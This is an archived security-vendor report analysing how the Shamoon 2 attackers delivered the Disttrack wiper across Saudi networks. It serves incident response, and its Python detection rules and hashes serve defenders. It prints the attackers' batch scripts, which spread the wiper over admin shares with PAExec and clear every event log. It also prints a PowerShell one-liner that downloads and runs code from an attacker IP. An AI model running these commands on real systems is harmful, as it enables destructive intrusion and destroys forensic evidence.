{
	"id": "2efe6664-66d8-4924-a6b6-d77573dd9d0f",
	"created_at": "2026-04-06T00:20:52.327858Z",
	"updated_at": "2026-04-10T13:11:27.481597Z",
	"deleted_at": null,
	"sha1_hash": "c6a21866539c9e1f90bd4930fd3a7160ecab9507",
	"title": "Shamoon 2: Delivering Disttrack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 169740,
	"plain_text": "Shamoon 2: Delivering Disttrack\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2017-03-26 · Archived: 2026-04-05 20:23:48 UTC\r\nSince late November 2016, the Shamoon 2 attack campaign has brought three waves of destructive attacks to\r\norganizations within Saudi Arabia. Our investigation into these attacks has unearthed more details into the method\r\nby which the threat actors delivered the Disttrack payload. We have found evidence that the actors use a\r\ncombination of legitimate tools and batch scripts to deploy the Disttrack payload to hostnames known to the\r\nattackers to exist in the targeted network.\r\nOur analysis shows that the actors likely gathered the list of known hostnames directly from Active Directory or\r\nduring their network reconnaissance activities conducted from a compromised host. This network reconnaissance,\r\ncoupled with the credential theft needed to hardcode Disttrack payloads with legitimate username and password\r\ncredentials, leads us to believe that it is highly likely the threat actors had sustained access to the targeted\r\nnetworks prior to Shamoon 2 attacks. Our research confirms that successful credential theft from targeted\r\norganizations was an integral part of the Shamoon 2 attackers’ playbook, and they used these stolen credentials for\r\nremote access and lateral movement.\r\nOur analysis also shows an actor distributes Disttrack within the targeted network by first compromising a system\r\nthat is used as the Disttrack distribution server on that network. The actor then uses this server to compromise\r\nother systems on the network by using the hostname to copy over and execute the Disttrack malware. On each of\r\nthese named systems that are successfully compromised, the Disttrack malware will attempt to propagate itself to\r\n256 additional IP addresses on the local network. 
This rudimentary but effective distribution system enables Disttrack to propagate to additional systems from a single, initially compromised system in a semi-automated fashion.\r\nIn this post we also explore a possible connection between Shamoon 2 and the Magic Hound campaign, outlining the evidence for a link between the two attack campaigns, and we describe a possible scenario in which the two campaigns worked in conjunction to execute the Shamoon 2 attacks.\r\nDelivery Method\r\nSince our initial blog discussing the reemergence of Shamoon in November 2016, we were curious how the threat actor initially delivers the Disttrack payload to the targeted network. We were equally curious about how Disttrack was so effective at causing mass destruction on targeted networks, as we mentioned in our initial blog that the Disttrack Trojan itself is only able to spread to 256 IP addresses on the same local network as the compromised host.\r\nFrom gathering files associated with the third wave of Shamoon 2 attacks, we found a Zip archive that contains the files the attacker used to infect other systems on the targeted network from a single compromised system they then use as a Disttrack distribution server. The actor deploys the Zip archive to this distribution server by logging in to the compromised system using Remote Desktop Protocol (RDP) with stolen, legitimate credentials and downloading the Zip from a remote server. The actor uses this single compromised system to distribute Disttrack to other systems in different parts of the network, where the Disttrack Trojan would then attempt to spread to 256 other systems on each local network. \r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/\r\nPage 1 of 7\n\n
The chart in Figure 1 visualizes the delivery of Disttrack at a high level.\r\nFigure 1 High-level view of Disttrack deployment in Shamoon 2 attack\r\nDistributing Disttrack\r\nAs mentioned before, we obtained files used by the threat actors to deploy the Disttrack payload to additional systems on the network. While we do not know exactly how the threat actor initially compromised and gained RDP access to the Disttrack distribution server, we believe the actor downloads to this system a Zip archive containing a number of files, including files with the names listed in Table 1. The set of files saved to the distribution server includes executables, batch scripts and text files. We will explain the purpose and contents of each of these files and how the actor uses them in the deployment of Disttrack.\r\nFilename           Description\r\nexec-template.txt  Launcher commands (not a batch script) the actor runs to launch the deployment of the Disttrack payload onto additional systems at the targeted organization\r\n1.txt – 400.txt    Sequentially named text files containing the DNS names of hosts on the targeted network\r\nok.bat             Deployment batch script\r\nntertmgr32.bat     Disttrack installation batch script\r\nntertmgr32.exe     Disttrack payload\r\npa.exe             PAExec, Power Admin’s open source PsExec alternative\r\nTable 1 Files associated with the Disttrack Distribution Server\r\nWhen deploying Disttrack on the targeted network, the threat actor runs the commands stored in the exec-template.txt file, which read in the contents of each of the “1.txt” through “400.txt” text files; these contain a list of hostnames of systems on the network, one hostname per line. The commands then run the “ok.bat” deployment batch script once for each hostname from the text files. 
Figure 2 shows the contents of the “exec-template.txt” launcher script, which uses for loops to run the deployment batch script with each hostname from the text files as an argument (lines removed for brevity).\r\nfor /F %J in (1.txt) do ok.bat %J\r\nfor /F %J in (2.txt) do ok.bat %J\r\nfor /F %J in (3.txt) do ok.bat %J\r\nfor /F %J in (4.txt) do ok.bat %J\r\nfor /F %J in (5.txt) do ok.bat %J\r\nfor /F %J in (6.txt) do ok.bat %J\r\nfor /F %J in (7.txt) do ok.bat %J\r\nfor /F %J in (8.txt) do ok.bat %J\r\nfor /F %J in (9.txt) do ok.bat %J\r\nfor /F %J in (10.txt) do ok.bat %J\r\nfor /F %J in (11.txt) do ok.bat %J\r\nfor /F %J in (12.txt) do ok.bat %J\r\nfor /F %J in (13.txt) do ok.bat %J\r\nfor /F %J in (14.txt) do ok.bat %J\r\nfor /F %J in (15.txt) do ok.bat %J\r\n..snip..\r\nfor /F %J in (399.txt) do ok.bat %J\r\nfor /F %J in (400.txt) do ok.bat %J\r\nFigure 2 Contents of the exec-template.txt launcher commands\r\nAt first, we believed the actor would change the file extension of the exec-template.txt file to “.bat” and execute it as a batch script. We no longer believe this is the case, as the “for” commands contained within exec-template.txt reference the loop variable using a single percent symbol, specifically “%J” as seen in Figure 2. Inside a batch script this causes a syntax error; according to MSDN, to run these “for” commands from a batch script the actor would have to use two percent symbols, specifically “%%J” in this case. 
We now believe that the threat actor manually copies the contents of exec-template.txt and pastes these commands directly into a command prompt to run them.\r\nWe cannot show the contents of the “1.txt” through “400.txt” files, as they contain new-line-delimited lists of the DNS names for hosts specific to the targeted organizations.\r\nIn the files we obtained from the Disttrack distribution server, there were only 29 instead of 400 text files, each of which contained 30 hostnames, except for the last one, which contained only four, for a total of 844 hostnames. In the text files we analyzed, the hostnames were included as their DNS name, specifically in the format \u003ccomputer name\u003e.\u003cdomain name\u003e.local, which we believe shows they were obtained directly from Active Directory on a domain controller. The importance of including the DNS names for these hosts is that it allows the actor to connect to these systems in the subsequent commands.\r\nThe “ok.bat” batch script runs once per hostname mentioned above and is responsible for deploying Disttrack on each of these systems. The script begins by copying two files via the remote host’s administrative share (\\\\\u003chostname\u003e\\C$) into the “C:\\Windows\\temp” folder on the remote system. The two copied files – named “ntertmgr32.exe” and “ntertmgr32.bat” – are the Disttrack payload and a batch script used to install the Disttrack payload on the local system, respectively. The “ok.bat” script then uses the PAExec (“pa.exe”) application to run the “ntertmgr32.bat” installation script on the remote system; the “-s” switch runs it under the SYSTEM account and “-d” returns without waiting for it to finish, so the deployment loop moves on to the next host immediately. Finally, the batch script enumerates every event log on the remote host with the Windows built-in “wevtutil” utility (“wevtutil el /r:\u003chostname\u003e”) and clears each one (“wevtutil cl”), in an attempt to conceal the actor’s activities and disrupt incident response and forensic analysis. For responders this means that the absence of event logs on an affected host is itself an indicator, and the only remaining record of the deployment may be on the distribution server or in centrally forwarded logs.\r\nFigure 3 shows the contents of the “ok.bat” script. 
Interestingly, the actor included an argument “-r SVCNSS”, which is an invalid argument for PAExec; the actor would need to remove it prior to distribution. The “-r” argument is a valid argument within Microsoft’s PsExec that specifies the name of the remote service to create, suggesting the threat actors may also have used the PsExec application for distribution.\r\ncopy /Y ntertmgr32.bat \\\\%1\\C$\\Windows\\temp\\\r\ncopy /Y ntertmgr32.exe \\\\%1\\C$\\Windows\\temp\\\r\npa.exe \\\\%1 -r SVCNSS -s -d C:\\\\Windows\\temp\\ntertmgr32.bat\r\nfor /F %%i in ('wevtutil el /r:%1' ) do (wevtutil cl /r:%1 %%i )\r\nFigure 3 Contents of the ok.bat batch script\r\nNote that this script uses the “%%i” form, which is the correct loop-variable syntax for a batch file and is consistent with it being run as a script rather than pasted into a prompt like exec-template.txt.\r\nThe “ntertmgr32.bat” batch script that runs on each end system is responsible for installing the Disttrack payload as a service on the local system. The batch script, as seen in Figure 4, resolves its own directory (“%~dp0”, i.e. C:\\Windows\\temp\\), copies the Disttrack payload (“ntertmgr32.exe”) from there to the “C:\\Windows\\System32” folder and then executes the newly copied file using the “start” command with “service” as an argument. This script not only installs but also launches the Disttrack payload.\r\n@echo off\r\nset u100=ntertmgr32.exe\r\nset u200=service\r\nset u800=%~dp0\r\ncopy /Y \"%u800%%u100%\" \"%systemroot%\\system32\\%u100%\"\r\nstart /b %systemroot%\\system32\\%u100% %u200%\r\nFigure 4 Contents of the ntertmgr32.bat batch script\r\nOnce the Disttrack payload executes, it will begin carrying out its functionality, specifically attempting to spread to other systems on the local network and wiping systems at a pre-defined time in the future. 
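\r\nThe three-step pattern in ok.bat (copy into the Windows temp folder on the remote C$ share, PAExec as SYSTEM with -s -d, then a wevtutil clear of every log) and the ntertmgr32.bat launch are easy to hunt for in process-creation telemetry. The following Python script is an added example, not part of the original post and not Unit 42 tooling: it normalizes command lines and applies one rule per step. The rule names, the hostname SRV01.corp.local and the sample command lines are constructed for the illustration.
```python
import re

BS = chr(92)  # a single backslash, kept out of the literals so the Windows paths stay readable


def win(s: str) -> str:
    # Helper for the constructed samples only: the pipe character stands in for a backslash
    return s.replace('|', BS)


def normalize(cmdline: str) -> str:
    # Fold both separators to '/' and lower-case, so one pattern covers C$ on Windows and c$ on windows
    return cmdline.replace(BS, '/').lower()


# One rule per observable step of the deployment described in the post.
# Rule names are our own labels, not anything from the original report.
RULES = {
    # ok.bat step 1: payload and installer copied to the remote C$ share, Windows temp folder
    'admin_share_drop_to_temp': re.compile(r'//[^/ ]+/c[$]/windows/temp/'),
    # ok.bat step 2: PAExec/PsExec against a remote host, as SYSTEM (-s), detached (-d), running a .bat
    'paexec_remote_bat_as_system': re.compile(
        r'(^|/)(pa|paexec|psexec|psexec64)([.]exe)? +//[^ ]+ .*-s .*-d .*[.]bat'),
    # ok.bat step 3: event logs cleared with wevtutil (locally or via /r: on a remote host)
    'wevtutil_clear_log': re.compile(r'(^|/)wevtutil([.]exe)? +(cl|clear-log) '),
    # ntertmgr32.bat: the dropped payload started from System32 with the service argument
    'disttrack_service_launch': re.compile(r'/system32/ntertmgr32[.]exe +service'),
}

# The three rules that together make up the ok.bat deployment chain
CHAIN = ('admin_share_drop_to_temp', 'paexec_remote_bat_as_system', 'wevtutil_clear_log')


def classify(cmdline: str) -> list:
    # Names of every rule the command line matches, in RULES order
    n = normalize(cmdline)
    return [name for name, pattern in RULES.items() if pattern.search(n)]


def scan(cmdlines) -> dict:
    # Map rule name -> matching command lines, so an analyst sees the chain at a glance
    hits = {}
    for line in cmdlines:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    return hits


def deployment_chain_observed(cmdlines) -> bool:
    # True when all three ok.bat steps were seen in this set of command lines
    hits = scan(cmdlines)
    return all(name in hits for name in CHAIN)


# Constructed sample process-creation command lines (not real telemetry): the
# ok.bat steps as they would appear on the distribution server with %1 expanded,
# the ntertmgr32.bat launch as seen on a target, and two benign admin commands.
SAMPLE_CMDLINES = [
    win('copy /Y ntertmgr32.bat ||SRV01.corp.local|C$|Windows|temp|'),
    win('pa.exe ||SRV01.corp.local -r SVCNSS -s -d C:|Windows|temp|ntertmgr32.bat'),
    win('wevtutil cl /r:SRV01.corp.local Security'),
    win('C:|Windows|System32|ntertmgr32.exe service'),
    win('wevtutil qe Application /c:5'),            # a log query, not a clear
    win('robocopy C:|data ||FS01|share|backup'),    # a copy, but not to an admin share
]

if __name__ == '__main__':
    for rule, lines in scan(SAMPLE_CMDLINES).items():
        print(rule)
        for line in lines:
            print('    ' + line)
    print('deployment chain observed:', deployment_chain_observed(SAMPLE_CMDLINES))
```
Run it over Sysmon Event ID 1 or Windows Security 4688 command lines exported from the distribution server and the targeted hosts. A single hit on the wevtutil rule is worth an investigation on its own; all three ok.bat rules hitting from one source host is the deployment chain itself, and that source host is the distribution server.\r\n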
As discussed in our initial blog on Shamoon 2, the Disttrack payload will attempt to infect additional systems on the same /24 subnet (x.x.x.0-x.x.x.255) by logging in to the remote system, copying itself to the system, and executing the copied payload by creating a scheduled task to run it.\r\nDisttrack Distribution System – Possible Link to Magic Hound\r\nAs mentioned earlier in this blog post, we know that the threat actor downloads several files to the distribution server to infect systems on the network with Disttrack. In addition to the files mentioned in the previous section, it appears that the threat actor copied a PowerShell script to the distribution server as well. This PowerShell script, seen in Figure 5, appears to have been generated by Metasploit’s “web_delivery” module to download and execute a payload from a remote server at 45.76.128[.]71, which we speculate was used to create a meterpreter session on the system. The one-liner is a typical stager: it runs hidden with no profile (“-nop -w hidden”), builds a WebClient that inherits the system proxy and the current user’s default credentials so that it works from behind a corporate proxy, and passes whatever the server returns straight to Invoke-Expression (IEX) without writing it to disk.\r\npowershell.exe -nop -w hidden -c $L=new-object net.webclient;$L.proxy=[Net.WebRequest]::GetSystemWebProxy();$L.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $L.downloadString(\"http://45.76.128.71:8080/[random string redacted]\");\r\nFigure 5 PowerShell script used to download files to distribution system\r\nThe server hosting the files has an IP address of 45.76.128[.]71, which resides within the IP range associated with a cloud hosting service that allows customers to create server instances in specific geographic locations and configurations. According to GeoIP mapping data for 45.76.128[.]71, it appears this IP range is geographically based in the London cloud instance. 
The use of this specific IP is interesting, as the Magic Hound campaign we previously reported on (February 2017) used a command and control (C2) server at 45.76.128[.]165, which is in the same Class C (/24) IP range.\r\nWhile we cannot conclusively state the existence of a specific relationship between the Shamoon and Magic Hound adversaries, there are now several factors that are suggestive of some form of association, including:\r\n1. Targeting of entities within Saudi Arabia.\r\n2. Use of the same cloud computing service in the same Class C IP range.\r\n3. Use of PowerShell and meterpreter.\r\nTaken together, these are all factors to consider when postulating a relationship between the Shamoon and Magic Hound attackers; on its own, a shared hosting provider and a shared /24 is weak evidence, since any customer of that provider can be assigned an address in the same range. Furthermore, it is possible that these artifacts were some of the factors used by our peers at X-Force and Kaspersky to tie the Magic Hound attacks to Shamoon.\r\nIf the Magic Hound attacks are indeed related to the Shamoon attack cycle, we may hypothesize that the Magic Hound attacks were used as a beachhead to perform reconnaissance for the adversaries and gather network information and credentials. This may be further supported by the initial Magic Hound payloads we discovered, Pupy RAT and meterpreter, both of which have these types of capabilities.\r\nConclusion\r\nWe have determined that the actors conducting the Shamoon 2 attacks use one compromised system as a distribution point to deploy the destructive Disttrack Trojan to other systems on the targeted network, after which the Disttrack malware will seek to propagate itself even further into the network. 
Using an open source utility called PAExec and several batch scripts, the actor copies the Disttrack payload to other systems on the network, whose hostnames we believe were obtained directly from Active Directory or through network reconnaissance activities. Once the Disttrack payload has been deployed to these initial hosts, Disttrack will attempt to spread on their local networks to amplify the impact of the attack. While the actors interact directly with the distribution system, the use of this single compromised system allows them to automate the deployment of the payload and quickly infect systems across the targeted network. These findings also suggest a possible relationship between the Shamoon and Magic Hound attack campaigns. We will continue to analyze these attacks to determine further activities carried out by these actors and expose any additional correlations to known threat groups.\r\nThe theft and subsequent reuse of credentials is a common element in many attackers’ playbooks. We have recently published a white paper, “Credential-Based Attacks: Exposing the Ecosystem and Motives Behind Credential Phishing, Theft and Abuse,” detailing how credentials are stolen and later abused, with guidance on how you can defend yourself and your organization against this type of threat. 
Collectively, the Shamoon 2 attacks are a good example not only of the ways attackers obtain stolen credentials but also of what they can do with them.\r\nIndicators of Compromise\r\nSHA256 hashes of the files recovered from the distribution server (pa.exe is the legitimate PAExec binary, so its hash should be used only in combination with the other artifacts):\r\n4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b: exec-template.txt\r\n5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a: ok.bat\r\n01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc: pa.exe\r\nc7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95: ntertmgr32.bat\r\nSource: http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
	],
	"report_names": [
		"unit42-shamoon-2-delivering-disttrack"
	],
	"threat_actors": [
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434852,
	"ts_updated_at": 1775826687,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.pdf",
		"text": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.txt",
		"img": "https://archive.orkl.eu/c6a21866539c9e1f90bd4930fd3a7160ecab9507.jpg"
	}
}